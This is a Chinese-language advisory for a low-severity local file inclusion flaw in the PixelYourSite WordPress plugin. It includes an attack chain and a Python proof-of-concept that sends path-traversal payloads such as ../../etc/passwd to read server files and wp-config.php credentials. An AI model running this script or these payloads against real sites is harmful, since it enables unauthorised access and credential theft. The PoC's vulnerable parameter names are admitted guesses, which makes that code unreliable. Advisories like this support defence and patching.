CVE-2025-10723: PixelYourSite WordPress插件本地文件包含漏洞

漏洞信息

漏洞编号

CVE-2025-10723

漏洞类型

本地文件包含(LFI)

CVSS评分

2.7 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

PixelYourSite WordPress插件

漏洞概述

CVE-2025-10723是WordPress插件PixelYourSite中的一个本地文件包含漏洞。该插件在11.1.2之前的版本中，对某些URL参数缺乏充分的输入验证，直接将这些参数用于生成文件路径并传递给相关函数。攻击者（需具备管理员权限）可以通过构造恶意请求，利用未验证的URL参数实现目录遍历，从而读取服务器上的敏感文件，如配置文件、凭据文件或其他系统文件。此漏洞的CVSS评分为2.7，属于低危级别，主要影响机密性。由于攻击需要高权限用户参与，且利用复杂度较低，建议受影响用户尽快升级到最新版本以修复此安全问题。

技术细节

PixelYourSite插件在处理URL参数时存在安全缺陷。具体问题在于插件直接获取URL中的特定参数值，未进行适当的路径安全检查（如使用realpath()验证、使用basename()清理、使用白名单限制等），直接将参数值拼接到文件包含路径中。攻击者可以利用路径遍历字符（如../）来访问插件目录之外的文件。例如，攻击者可能通过构造类似?pys_settings[some_param]=../../../../etc/passwd的请求，读取系统的passwd文件或其他敏感配置。此漏洞的利用条件为：1）攻击者需要拥有WordPress管理员权限；2）目标站点运行受影响版本的PixelYourSite插件；3）攻击者能够发送HTTP请求。由于插件未对用户输入进行路径规范化处理，恶意路径可能被成功解析和包含。

攻击链分析

STEP 1

信息收集

攻击者首先确认目标网站使用WordPress并安装了PixelYourSite插件，可通过查看页面源代码或使用wpscan等工具扫描

STEP 2

权限获取

攻击者需要获得WordPress管理员账户权限，可通过钓鱼、密码爆破、社会工程学或其他漏洞获取

STEP 3

构造恶意请求

攻击者构造包含路径遍历字符的URL参数，如pys_settings[param]=../../../../etc/passwd，利用未验证的输入进行目录遍历

STEP 4

发送攻击请求

通过HTTP GET或POST请求向目标WordPress站点发送构造的恶意参数，触发插件中的文件包含逻辑

STEP 5

获取敏感文件

如果成功，服务器会返回请求的文件内容，攻击者可读取wp-config.php获取数据库凭据、或其他敏感配置文件

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-10723 PoC - PixelYourSite LFI
# Target: WordPress site with vulnerable PixelYourSite plugin (< 11.1.2)
# Requirement: Admin privileges

def exploit_lfi(target_url, file_path='../../../../../../etc/passwd'):
    """
    Exploit Local File Inclusion vulnerability in PixelYourSite plugin
    
    Args:
        target_url: Base URL of the WordPress site
        file_path: Path to the file to read (default: /etc/passwd)
    
    Returns:
        Content of the requested file
    """
    # Target the PixelYourSite settings endpoint
    # The vulnerable parameter name may vary, common patterns include:
    # pys_settings, pixelyoursite_settings, etc.
    
    vulnerable_params = [
        'pys_settings[some_param]',
        'pixelyoursite[settings]',
        'pys[ajax_endpoint]',
    ]
    
    for param in vulnerable_params:
        # Construct the malicious URL with LFI payload
        payload = {param: file_path}
        
        try:
            response = requests.get(target_url, params=payload, timeout=10)
            
            # Check if the response contains file content
            if 'root:' in response.text or 'daemon:' in response.text:
                print(f'[+] Successfully exploited via parameter: {param}')
                print(f'[+] File content:\n{response.text[:500]}')
                return response.text
            elif response.status_code == 200:
                print(f'[*] Parameter {param} responded but content unclear')
        except requests.RequestException as e:
            print(f'[-] Error with parameter {param}: {e}')
    
    print('[-] Exploitation failed - target may not be vulnerable or fixed')
    return None

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print('Usage: python cve-2025-10723_poc.py <target_url> [file_path]')
        print('Example: python cve-2025-10723_poc.py http://example.com/wp-admin/admin.php')
        sys.exit(1)
    
    target = sys.argv[1]
    file_to_read = sys.argv[2] if len(sys.argv) > 2 else '../../../../../../etc/passwd'
    
    print(f'[*] Targeting: {target}')
    print(f'[*] Attempting to read: {file_to_read}')
    
    exploit_lfi(target, file_to_read)

影响范围

PixelYourSite < 11.1.2

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时措施：1）限制WordPress管理员账户的创建，仅授予可信用户管理员权限；2）使用Web应用防火墙（WAF）规则阻止包含路径遍历字符（如../）的请求；3）临时禁用PixelYourSite插件直到完成升级；4）加强对管理员账户的安全防护，启用双因素认证；5）监控访问日志中异常的URL参数模式。